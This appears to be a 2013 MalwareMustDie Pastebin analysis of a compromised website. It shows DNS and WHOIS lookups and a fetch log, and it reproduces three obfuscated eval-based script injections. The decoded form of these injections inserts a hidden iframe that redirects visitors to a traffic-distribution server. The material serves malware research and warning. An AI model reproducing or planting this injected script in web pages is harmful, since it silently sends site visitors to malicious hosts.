SHARE
TWEET

#MalwareMustDie - Warning on: oklahomanews-online.com

MalwareMustDie Mar 1st, 2013 104 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie! @unixfreaxjp /malware]$ date
  2. Sat Mar  2 01:52:32 JST 2013
  3.  
  4. // Just beware of: oklahomanews-online.com / 75.126.35.116
  5.  
  6. oklahomanews-online.com  A      75.126.35.116
  7. oklahomanews-online.com  NS     ns1.kidzcartoonfun.com
  8. oklahomanews-online.com  NS     ns2.kidzcartoonfun.com
  9. www.oklahomanews-online.com      CNAME  oklahomanews-online.com
  10. ↑Not a good site at all...
  11.  
  12. --2013-03-02 01:38:13--  http://mygenesreconnected.com/tag/aaron-kampman-jersey
  13. Resolving mygenesreconnected.com... seconds 0.00, 184.22.209.166
  14. Caching mygenesreconnected.com => 184.22.209.166
  15.  
  16. GET /tag/aaron-kampman-jersey HTTP/1.0
  17. Host: mygenesreconnected.com
  18. HTTP request sent, awaiting response...
  19.   :
  20. HTTP/1.0 301 Moved Permanently
  21. Date: Fri, 01 Mar 2013 16:37:56 GMT
  22. Server: Apache/2.2.22 (CentOS)
  23. X-Powered-By: PHP/5.2.17
  24. X-Pingback: http://www.mygenesreconnected.com/xmlrpc.php
  25. Location: http://www.mygenesreconnected.com/tag/aaron-kampman-jersey/
  26. Content-Length: 0
  27. Connection: close
  28. Content-Type: text/html; charset=UTF-8
  29.   :
  30. 301 Moved Permanently
  31. Location: http://www.mygenesreconnected.com/tag/aaron-kampman-jersey/ [following]
  32.   :
  33. --2013-03-02 01:38:13--  http://www.mygenesreconnected.com/tag/aaron-kampman-jersey/
  34. Resolving www.mygenesreconnected.com... seconds 0.00, 184.22.209.166
  35. Caching www.mygenesreconnected.com => 184.22.209.166
  36. Connecting to www.mygenesreconnected.com|184.22.209.166|:80... seconds 0.00, connected.
  37.   :
  38. GET /tag/aaron-kampman-jersey/ HTTP/1.0
  39. Referer: http://google.com
  40. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
  41. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  42. Host: www.mygenesreconnected.com
  43. Connection: keep-alive
  44. Keep-Alive: 300
  45. Accept-Language: en-us,en;q=0.5
  46. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  47. HTTP request sent, awaiting response...
  48.   :
  49. HTTP/1.0 200 OK
  50. Date: Fri, 01 Mar 2013 16:37:57 GMT
  51. Server: Apache/2.2.22 (CentOS)
  52. X-Powered-By: PHP/5.2.17
  53. X-Pingback: http://www.mygenesreconnected.com/xmlrpc.php
  54. Connection: close
  55. Content-Type: text/html; charset=UTF-8
  56.   :
  57. 200 OK
  58. Length: unspecified [text/html]
  59. Saving to: `index.html'
  60. 2013-03-02 01:38:15 (73.0 KB/s) - `index.html' saved [30641]
  61.  
  62.  
  63. //found three redirectors in index.html..:
  64.  
  65. <p> <script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-630!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script></p>
  66. <p> <script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-630!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script></p>
  67. <p> <script>try{window.document.body/=2}catch(dgsgsdg){whwej=12;ww=window;}if(whwej){try{f=document.createElement("div");}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","3p","47","47","3p","44","3n","3l","44","41","3l","43","1k","41","46","3o","47","1l","2b","4c","4a","3j","4e","3n","44","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(whwej){for(i=0;i-630!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}</script></p>
  68.  
  69. //------------------------------
  70.  
  71. //Evals
  72.  
  73.     if (document.getElementsByTagName('body')[0]){
  74.       iframer();
  75.     }
  76.     else {
  77.       document.write("
  78.     <iframe src='http://googleclick.info/?travel' width='100' height='100' style='width:100px;
  79.     height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
  80.     }
  81.     function iframer(){
  82.       var f = document.createElement('iframe');
  83.       f.setAttribute('src', 'http://googleclick.info/?travel');
  84.       f.style.left = '-10000px';
  85.       f.style.visibility = 'hidden';
  86.       f.style.top = '0';
  87.       f.style.position = 'absolute';
  88.       f.style.top = '0';
  89.       f.setAttribute('width', '100');
  90.       f.setAttribute('height', '100');
  91.       document.getElementsByTagName('body')[0].appendChild(f);
  92.     }
  93.  
  94. // Writes
  95.  
  96.     <iframe src='http://googleclick.info/?travel' width='100' height='100' style=
  97.     'width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>
  98.  
  99. // ↑go to TDS redirector.. who knows what they set you up...
  100.  
  101.  
  102. //who's responsible for googleclick.info?
  103.  
  104. Domain ID:D49081589-LRMS
  105. Domain Name:GOOGLECLICK.INFO
  106. Created On:01-Feb-2013 07:48:44 UTC
  107. Last Updated On:26-Feb-2013 05:48:36 UTC
  108. Expiration Date:01-Feb-2014 07:48:44 UTC
  109. Sponsoring Registrar:DomainContext Inc. (R524-LRMS)
  110. Status:CLIENT TRANSFER PROHIBITED
  111. Status:TRANSFER PROHIBITED
  112. Registrant ID:PP-SP-001
  113. Registrant Name:Domain Admin
  114. Registrant Organization:PrivacyProtect.org
  115.   :
  116. Name Server:NS1D3.STATUSHOST.RU
  117. Name Server:NS2D3.STATUSHOST.RU
  118.  
  119. ---
  120. #MalwareMustDie!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top